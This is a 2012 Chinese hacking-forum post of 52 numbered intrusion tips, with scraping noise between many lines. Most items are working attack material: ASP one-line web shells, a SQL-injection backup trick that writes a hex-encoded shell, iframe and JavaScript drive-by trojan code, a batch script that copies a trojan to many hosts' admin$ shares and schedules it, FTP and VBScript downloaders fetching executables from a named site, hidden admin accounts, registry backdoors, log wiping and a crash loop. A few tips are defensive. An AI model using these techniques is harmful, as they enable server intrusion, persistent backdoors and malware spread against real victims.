找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2083|回复: 0
打印 上一主题 下一主题

入侵渗透笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:13:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,& Q" z4 r8 Q. q4 a
cacls C:\windows\system32 /G hqw20:R
# |6 d, p( F9 P思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入4 x& R# p* c1 m8 c# j; Z
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F6 r% R, K/ Z7 R, w1 S1 q2 l3 p
4 L+ v7 k. T0 H; h* {$ T
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 U1 O) O4 _, w! s( `5 q4 I/ d
8 u3 V; G0 L/ d; y+ J+ t9 r/ r3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。0 ]9 \7 T) H! g' \3 V* W

' a0 i+ f9 n8 o& R) U" d4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
6 `8 U: [3 S; R, Y" a5 |
0 S  f0 f6 @+ g5、利用INF文件来修改注册表  O. t- P+ u0 F4 q
[Version]9 z% a+ I8 h$ |8 L2 o
Signature="$CHICAGO$"3 U" M  {1 G0 _6 m+ G5 x
[Defaultinstall]
& Q% ^# y6 j  @# t8 u2 s: n9 OaddREG=Ating: J9 \. D: F0 Q1 f
[Ating]5 L* Y& @5 x% M; R1 b2 C
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"  @( W6 D0 R  g
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
- N6 d' v/ T/ N# L9 Frundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径1 @# ^3 E# s/ k$ G4 ~
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* y4 [  J: z. h5 s& \! Q
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU; C! x& J/ G+ h0 T! F- L
HKEY_CURRENT_CONFIG 简写为 HKCC
- a$ V& m, h' C% U& a; i; y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
% L) B. j3 z" \0 N% p# q"1"这里代表是写入或删除注册表键值中的具体数据
' T) }5 P; G! c  i! D& [/ v5 K
, W) Z$ E+ r. `5 `4 h6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
; K# ~+ [$ p% L& M+ {1 w9 a* J. L多了一步就是在防火墙里添加个端口,然后导出其键值6 |8 G& c* q' L- e
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
3 C/ _7 B* z7 M# f  J  t; w# a3 E6 H5 F9 L  }- w* C
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
0 v, r! C- K6 ~) q+ @在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
4 V' k6 f/ w2 F1 y; S$ z
8 ~  a; r  T, b8 g8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。* [1 ^0 @: c8 J
, s4 f8 H7 a! d+ y+ V5 c
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,  W5 _. ^& O' S& p# J
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ z4 B8 f; Y; |  A: J  |8 n; {$ g- w
$ C7 }% u, x! r. C0 ]$ }. l" T7 i
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
" K9 k2 n5 y5 T. H; a4 O9 }6 a
5 s. k3 A  W; U5 P5 r+ k, s$ q3 O: O11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
, l) p2 ]4 h0 s: t1 {用法:xsniff –pass –hide –log pass.txt
0 Y4 u9 W4 V, D5 {( b8 o: ~3 ~1 B3 ], h! ]( E/ x7 ?! T* i) d
12、google搜索的艺术
& w+ v7 h2 v( b, Y搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 k" H6 }7 }2 x$ T) {5 R或“字符串的语法错误”可以找到很多sql注入漏洞。* `, g" n$ c5 z! A2 L, q

; ^4 L7 O/ \! p2 y13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。- Y4 [# {4 W2 t( K1 n. k
0 e; U7 x. p2 c; @
14、cmd中输入 nc –vv –l –p 1987
6 t9 |: f) [, a5 P! N做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
- T  f9 R' q- X- B% v- N% Y8 z( p7 l' r0 w; s
15、制作T++木马,先写个ating.hta文件,内容为5 e% I+ V$ n2 f8 k1 v9 z
<script language="VBScript">  p/ r" p) F0 M
set wshshell=createobject ("wscript.shell" )8 q" d# S! m5 T0 U, @
a=wshshell.run("你马的名称",1)
2 ?* H4 G0 n8 x: c# k+ }window.close! l; f# d. J4 L0 d+ ]
</script>
0 F  C, X9 [+ A* {4 ~% J再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
. L+ D! L! s# X% S8 g% ~! ~1 y  J. G" @3 ^7 S/ p" l
16、搜索栏里输入( [* H* o" X5 }+ K, |
关键字%'and 1=1 and '%'='% _1 r" Y) @% ^  N; x& d
关键字%'and 1=2 and '%'='
8 x  @& B( K6 ^8 e$ y比较不同处 可以作为注入的特征字符
* g( Q/ ^* Z; F8 C, V% \' @
  t4 M. E% F: X: x17、挂马代码<html>) \( N) q  ~1 T! j
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>5 u, k5 H+ ]( f# b: G$ L9 W7 J% }
</html>( s& D# s. e  Z1 h( v) F

! j1 Y/ d/ W" p6 c5 {9 A18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
8 g9 X& c& F. p, Z( Y! [. i* lnet localgroup administrators还是可以看出Guest是管理员来。! o' Q& [1 T  }+ y! P- o) b

7 I1 \# [" k$ k, P4 o19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' Y% j/ c) L" f% k0 y# \* s用法: 安装: instsrv.exe 服务名称 路径
/ a/ }% W4 T+ D$ N卸载: instsrv.exe 服务名称 REMOVE
# V' ?; s( u0 d  y, m8 t) f
6 {0 U* U1 t4 r$ Q4 y
4 b) d8 o- s; v* e4 p21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉/ K6 O+ f& j# G7 [
不能注入时要第一时间想到%5c暴库。
, B  _7 L- ^) N
+ O& n: j4 ]9 n. Q; o8 q  W, p22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
; s0 J) j+ ~  n* R# T$ \. x: _; k+ s" Z5 L. v+ a
23、缺少xp_cmdshell时
* A: z% y9 c6 `0 ^# ]尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( N9 U% Y) w8 H. R3 b- C9 H
假如恢复不成功,可以尝试直接加用户(针对开3389的)- z. c  g4 j, n9 L% y% v
declare @o int0 _% Z# p+ w6 y- |! c% Z' _
exec sp_oacreate 'wscript.shell',@o out% u% m3 m; S/ [
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ ]7 A& P0 \. K- y/ Z
( }0 W. [( \+ r$ y5 w+ ^& U) {1 J
24.批量种植木马.bat
3 G/ [/ n; F% i8 M2 b5 v+ ?for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ `3 ]: I5 z$ w  Rfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
8 L+ D2 b: C! R! }1 p4 ^扫描地址.txt里每个主机名一行 用\\开头
  O' I8 M# w6 s/ Y. C3 x$ @. T4 Q; K& o
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。, @9 M" U, V0 @, _
5 z, y* }1 k2 C. N+ a
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.- A$ C9 B/ p7 W
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
# W: ~9 h4 y4 W& |2 L' I# h.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
' Z% _: E/ a* ]# N9 {
! B. Q( D* D: I1 B27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
3 X2 B# o( }3 ^: G  {然后用#clear logg和#clear line vty *删除日志, {1 r% S0 l- d" L7 B0 A
% [6 y4 z. M6 i! Y
28、电脑坏了省去重新安装系统的方法& v8 G4 R2 F7 ?5 w, V9 O
纯dos下执行," y8 Z6 `; ~$ [# e) \! f
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config7 t! e( q4 a  G! o7 `
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
9 b; D2 q( l8 ?* Y( Y! S6 Y7 G  T' W& t1 x4 V
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 J# ~! Y! Q( S& sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
! l5 p9 M, G2 L% J/ |HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 }5 g) m! `# w/ b, N: o
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# ^5 O& e, Z. a, s+ @% ~  [9 J  Y
分别用0 X8 n' L, h/ F
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 x8 R* Y+ \3 [0 K: N! X
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! ], p" |8 `: i8 a/ Nregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, k3 p$ ?8 z: n
命令来导出注册表项' U' e; K- c$ u7 z/ x6 W
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 e6 l; J! o8 P/ l. D" O) g- A改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用9 O, g7 M0 N2 z6 I; A2 S
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。( P6 L$ c3 \( M! X, ?
& o! b* ?; [0 z5 V
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 u  T  \1 C+ R; gSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: U# b- ?8 v+ g5 Q' ]1 P. z- C% b: f$ e- P7 c- C/ _8 m
31、全手工打造开3389工具+ C" V- Y# J, q4 d' V
打开记事本,编辑内容如下:, _7 C4 N. f4 ^: G
echo [Components] > c:\sql3 D2 @% T5 W+ z" G/ r: L: }2 \
echo TSEnable = on >> c:\sql
) l# Z' Z# {6 W  O7 i# Bsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
  m2 @& z( Z, B/ d1 y% }编辑好后存为BAT文件,上传至肉鸡,执行. E1 f# A/ r) V- a1 |' a: T

& d3 G0 n! x: W* ~! M. ]7 G. @32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
, K0 ?- `1 h/ H. l! l# X; A
  O# x: ], `9 W8 b33、让服务器重启' L8 n$ b8 I/ v& k
写个bat死循环:0 F3 U2 w  x. w# @& v. Z+ \
@echo off
  }; ?9 d8 W' V2 ~% n:loop12 R3 C# I8 h9 q
cls& [4 J0 c' i  n
start cmd.exe
9 b4 c7 f3 h& O" Q1 U% zgoto loop1/ w1 D7 J) V/ O1 |' {/ e
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
& p% y, i% p) I9 L+ a4 p0 C0 [6 ?( Q8 k6 X) Y3 a
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
$ n' f* B, L3 D& z( J% m@echo off
2 u& ?& l) M6 e/ G# F( ~9 Cdate /t >c:/3389.txt
8 ]. o' T; @9 S0 Otime /t >>c:/3389.txt
: I: ]+ R. x% p6 [0 ~attrib +s +h c:/3389.bat
  ^+ ?7 ?7 G. s1 Y1 Aattrib +s +h c:/3389.txt8 F2 X' B) W1 [4 m$ o1 W  H
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; d3 t; a2 o/ ?$ |* [, K# F并保存为3389.bat# ~6 W1 t, P; c. e
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
% j9 k1 D' N) r9 Q8 ^
( J5 s0 L% ?% V7 D( D: C35、有时候提不了权限的话,试试这个命令,在命令行里输入:7 U& ]0 }* i, j' M! T8 L% M
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)5 y; ^* N* b" n8 H, ]8 c* ]
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
: |; B/ p2 e! }9 {. `
6 t! I: W6 Q; U3 G% j2 [& N+ q8 R+ g+ D36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; G: _: @' D) r8 C. eecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
4 Q! |$ b, N8 `' ]" h# ^( Gecho 你的FTP账号 >>c:\1.bat //输入账号% D) A, j0 s3 G( y( G, d& C
echo 你的FTP密码 >>c:\1.bat //输入密码8 A- G3 F2 _( n& x; t* X9 C
echo bin >>c:\1.bat //登入; `8 J! B8 P* K& a! S- t3 [
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么7 K$ j: {& N% v
echo bye >>c:\1.bat //退出( ]3 B% ]/ w: w, q! P7 y
然后执行ftp -s:c:\1.bat即可
: I$ o: k/ O+ I, Q
" a- m! C3 [6 {3 X: O37、修改注册表开3389两法
# Z$ A% @" [( h3 h8 ~(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
$ E8 }% ?# n" U! M) L! k, iecho Windows Registry Editor Version 5.00 >>3389.reg
  l! i) G4 c% Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
) c: r  R- l; G5 C! W! m( Oecho "Enabled"="0" >>3389.reg" A  ^4 n1 Y" f( q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows' A* c7 D  V7 U4 R8 K1 {1 x
NT\CurrentVersion\Winlogon] >>3389.reg
# B1 l$ X& I! f- M- T# C& Necho "ShutdownWithoutLogon"="0" >>3389.reg: |* O% U  D5 n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) G2 s: y! @) Z* `' l>>3389.reg& N7 v: ?1 w6 ^& ]: M
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
* R* t) d, k! ^& B: W% |: |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
4 q# M- v' O, [2 k- e/ e>>3389.reg
) E7 Q( r1 c3 b: z" S$ _echo "TSEnabled"=dword:00000001 >>3389.reg
" v- ^; i- s: |) r3 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
2 [0 ]0 m: q+ lecho "Start"=dword:00000002 >>3389.reg
( _! m. P7 Y0 Z" K! k& b5 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]0 `% j( ?( G5 {
>>3389.reg
0 _4 h; [" ^4 K/ G  }echo "Start"=dword:00000002 >>3389.reg
; a7 ]/ W" N' [6 h# p( b2 }echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg& s6 `( ]$ I' ?" C, P: o
echo "Hotkey"="1" >>3389.reg' ]0 t) z' O: }: s" F- K5 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* ~8 K* n+ I) }) W3 U% `0 m8 b4 g* aServer\Wds\rdpwd\Tds\tcp] >>3389.reg# `9 W8 R% J; p3 ]8 a
echo "PortNumber"=dword:00000D3D >>3389.reg- s5 `% v0 t" W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 F' s0 Z) ?  S" E
Server\WinStations\RDP-Tcp] >>3389.reg
) r/ @  Q8 F0 _  F8 ~echo "PortNumber"=dword:00000D3D >>3389.reg; R" h( r0 v6 \- A+ L3 j
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。% N  I+ p0 Q. B3 j9 ~, j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
4 M$ K% \0 \7 e因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效* P% |8 p/ K8 c. V- E
(2)winxp和win2003终端开启; T5 t+ ]2 M% P; Q
用以下ECHO代码写一个REG文件:
4 @# c& T; y7 e( P6 D* ?% ?echo Windows Registry Editor Version 5.00>>3389.reg5 i$ Q; p! m% I, ?$ I, Q, R7 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  p  C5 S* f* P# ?& Y* }Server]>>3389.reg
8 M% u3 r! s$ s6 r" iecho "fDenyTSConnections"=dword:00000000>>3389.reg6 e( @1 z; D# b9 R* _# d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% ?2 R5 Q* }" ~) B& AServer\Wds\rdpwd\Tds\tcp]>>3389.reg
7 t: z1 e: s- _' Aecho "PortNumber"=dword:00000d3d>>3389.reg
2 G/ p- I' c* J1 s( y5 o0 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 w9 K; p& Y. f4 z& YServer\WinStations\RDP-Tcp]>>3389.reg8 Z( m" a' \' b- N& X' d! S
echo "PortNumber"=dword:00000d3d>>3389.reg+ z& d: ~$ b- {: q  C
然后regedit /s 3389.reg del 3389.reg
6 j" |6 j- h. a. vXP下不论开终端还是改终端端口都不需重启
- B+ c. |* G* y) o& q7 I
% b& Z! t7 u7 V# H0 W6 F5 D38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃9 a3 b+ u3 p# @+ p& r- _4 g) y
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 C: Y+ R& P; p7 _) n" c- R1 t& Q
- n7 m9 S% v6 v
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!  @; C; B) S7 r1 g' M6 o+ _7 r
(1)数据库文件名应复杂并要有特殊字符3 @) m! O( W' t2 X# B) I$ ]
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# [' O( `3 n% V, w7 w0 a( V0 _将conn.asp文档中的
+ S% {% L7 ^: t2 u4 ZDBPath = Server.MapPath("数据库.mdb")
; q9 |# R0 e* Q' ]+ ^& dconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
; E- d! d( G, @7 p# w* e- t, w/ e4 G! e3 S! q
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
6 o0 L9 Z' }' Z" {5 F) W) }5 w(3)不放在WEB目录里5 v8 P+ o, F8 E, y0 ~
$ D5 o8 J3 x" N  W- Z( [& F+ k; b
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉) R! ^6 K, a6 m' t
可以写两个bat文件+ ?& T* p- K3 O) x
@echo off1 m/ ?1 K3 K( f' [; a$ v) P
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
# P8 s+ u& c: ?1 r& y7 o4 N@del c:\winnt\system32\query.exe& H% d0 t* J) y. ~
@del %SYSTEMROOT%\system32\dllcache\query.exe
; D4 Q. J" L+ U+ ^% [@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) A3 E6 z5 W( c. v2 c& Z
4 p% Z. i# p0 s: [. V8 Q
@echo off6 _+ q8 X5 f+ |
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
  U# ~! d2 Y' f. T: }0 O  N@del c:\winnt\system32\tsadmin.exe1 i3 m! g# |2 }' A$ J2 \
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex" N9 {+ r# ]9 L  F3 ]3 X
) t8 S* x0 f5 R* W. E: K
41、映射对方盘符
3 K+ w& _5 U. z& n. [telnet到他的机器上,
& E) m8 l0 B- Vnet share 查看有没有默认共享 如果没有,那么就接着运行
$ h+ i7 R- _, V7 Nnet share c$=c:
2 b% l, `% F$ K" qnet share现在有c$2 p, X$ z) j; m! |/ P# U1 ?
在自己的机器上运行" A  `0 y0 q3 ^- c/ B0 a" `
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K+ H  {* o1 q5 e1 N# c

) E4 V/ c: d+ i7 D8 r42、一些很有用的老知识
3 [% T1 L# O4 E9 n6 g, Dtype c:\boot.ini ( 查看系统版本 )+ F0 R& c9 i9 S
net start (查看已经启动的服务)
+ G  @, P/ b8 Q2 O7 Gquery user ( 查看当前终端连接 )
8 Z; J$ p" k+ ]2 I7 w; ^! b* e% {net user ( 查看当前用户 )5 y5 k1 T7 y  |. j
net user 用户 密码/add ( 建立账号 )6 [: w1 i8 D7 n4 C) ~* X& X/ L
net localgroup administrators 用户 /add (提升某用户为管理员)
  V! X! Z" R9 Z4 u4 Fipconfig -all ( 查看IP什么的 ), h4 y" \( d* J7 \/ I9 o
netstat -an ( 查看当前网络状态 )
/ d3 ]8 A6 F; G( P$ V! C! Rfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
- ?, B) S0 v9 P( x克隆时Administrator对应1F4
; M+ R0 L. m2 o2 T7 X' eguest对应1F55 g5 E3 G+ w* c  \6 b
tsinternetuser对应3E8" Z+ J2 f% H7 e2 l

' ]$ |1 p' L6 N% ?6 o! z% y# ?43、如果对方没开3389,但是装了Remote Administrator Service
% J2 v* k- z$ Q5 W4 Z用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接0 z' r) P7 a  ]& R* r. v  X
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
6 f% m3 n' |; L- x1 W, \$ v先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"( L  K: U0 u8 k1 L9 e
) G* y  s; o. r& x$ u0 s$ Z, M
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
2 S3 Q2 K$ q0 `本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ T7 t5 O3 g' k# w

1 F4 [1 V# r$ s- u45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)) x. Y4 H) b! A7 h1 ~
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open4 Q7 {& N1 w" U
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =, ]' \' t8 l  }# Z- O2 q
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 c6 z; r- g& |1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
# F+ c) L) s  h9 ?(这是完整的一句话,其中没有换行符)  Q2 s& m* i1 f; O- n3 u
然后下载:
. v( n. A! a/ P& w# U1 q5 _) ncscript down.vbs http://www.hack520.org/hack.exe hack.exe4 M  n  B# p7 Z: G. W- j& V
+ N1 W4 n# ~  Y; m0 @
46、一句话木马成功依赖于两个条件:6 b" \9 }" d6 U3 l& {1 Y0 U
1、服务端没有禁止adodb.Stream或FSO组件( i0 B& S! R. }5 _5 O4 \
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
; p6 B8 L6 e6 E! K  f4 `+ h4 I9 a5 N# I
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
  l1 t; _, ]2 B1 q" u7 `& n$ T;alter database utsz set RECOVERY FULL--3 q- v# s' [. F& S
;create table cmd (a image)--# ]" d) x0 l- Y
;backup log utsz to disk = 'D:\cmd' with init--
8 @/ M& J! j* w8 c;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--% ^0 g: H8 t/ u
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--+ ?# N* P, r9 o4 }# o3 L
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
: ^% S4 Y5 M- V) D. s; K0 r6 K, s- r6 x7 m# D
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:; d. P0 i/ e, T$ v7 _4 e+ q: S) Z

/ p& }0 z% W1 `) i1 h9 \用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
3 [3 j$ d( R* e8 S所有会话用 'all'。, ?6 f- r2 v4 e1 [1 x$ \% X
-s sessionid 列出会话的信息。
' e; q( C* B6 C& E-k sessionid 终止会话。; v' }6 M4 L( [8 A2 w3 Q) s& N
-m sessionid 发送消息到会话。
& ~" n5 T* Z5 q/ c" \# r
( b6 p$ r. v- P/ W  H2 B6 mconfig 配置 telnet 服务器参数。
' U7 C2 ^  Y; G3 v/ K  \
! I3 ~4 U1 E0 v/ j4 Tcommon_options 为:) B5 }5 Z( d" b, q
-u user 指定要使用其凭据的用户2 ?: G8 j4 F6 a$ n
-p password 用户密码
6 d* F5 q  f0 A) _+ N/ Y
' _( }( z: u; B! |* T1 A& Uconfig_options 为:; Q7 j/ r  T$ H) L5 ~& W& W
dom = domain 设定用户的默认域
7 U5 B4 K7 u! C6 }& h4 }% x% N6 ^ctrlakeymap = yes|no 设定 ALT 键的映射; [) Z" f+ ^, u, F& G1 |
timeout = hh:mm:ss 设定空闲会话超时值! d- T% E6 Y% N. s# F) f& g& }
timeoutactive = yes|no 启用空闲会话。
# u/ t) U* ^6 y4 mmaxfail = attempts 设定断开前失败的登录企图数。
5 ]: G; K( j2 g" z+ X; Nmaxconn = connections 设定最大连接数。2 y& ]9 \6 f& X7 k& R
port = number 设定 telnet 端口。
6 h3 h/ h. q+ Ysec = [+/-]NTLM [+/-]passwd
9 T, s7 U  E2 W" v! y6 y, @设定身份验证机构
' J' ?& R0 ?/ M9 G9 J/ q' cfname = file 指定审计文件名。
1 @. w# ?7 q6 e2 ~fsize = size 指定审计文件的最大尺寸(MB)。  p$ S1 n. Y/ S' ~
mode = console|stream 指定操作模式。! Y' u; r5 ]5 d" j
auditlocation = eventlog|file|both5 ~: _( ]7 {* Y) N+ g1 @
指定记录地点3 v# B5 C' d/ g8 a/ x4 Y
audit = [+/-]user [+/-]fail [+/-]admin3 A4 |0 B& B1 m7 c6 b' v/ {' ~
! u) H* X( J" {+ {. T$ A
49、例如:在IE上访问:
# G3 q* [% f0 R! Qwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
- ~) y1 \$ O( \! P9 Whack.txt里面的代码是:4 W0 T" K" ?  ?8 X
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, n- J( j5 P, }$ {; f3 H- }1 Y把这个hack.txt发到你空间就可以了!! P, m/ d3 c' P
这个可以利用来做网马哦!$ `5 d9 H6 K( P5 u3 e4 w1 \7 J+ M

8 C! K* m5 X1 }, _" C50、autorun的病毒可以通过手动限制!
. ^- L1 B( _, x" }1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!5 U6 i3 \: {( |# }
2,打开盘符用右键打开!切忌双击盘符~( d1 j+ ~/ p) E1 o; ~
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!  v3 B/ {; F8 p& d- P3 q- \" [
# K- e+ f. w) j& i5 w
51、log备份时的一句话木马:
0 A% h2 P4 S$ C# Ja).<%%25Execute(request("go"))%%25>
: g; }5 i2 L2 D% x- Mb).<%Execute(request("go"))%>" g8 e/ q% ]8 z! F
c).%><%execute request("go")%><%
/ l2 a2 {9 w7 f" \d).<script language=VBScript runat=server>execute request("sb")</Script>
1 }  F0 K, ~. D* {+ ke).<%25Execute(request("l"))%25>
, I" R. @5 z& E, P; \f).<%if request("cmd")<>"" then execute request("pass")%>
% o$ f' ^6 s" o1 [4 y2 u' y+ m% X; O  l9 H9 ^9 x
52、at "12:17" /interactive cmd
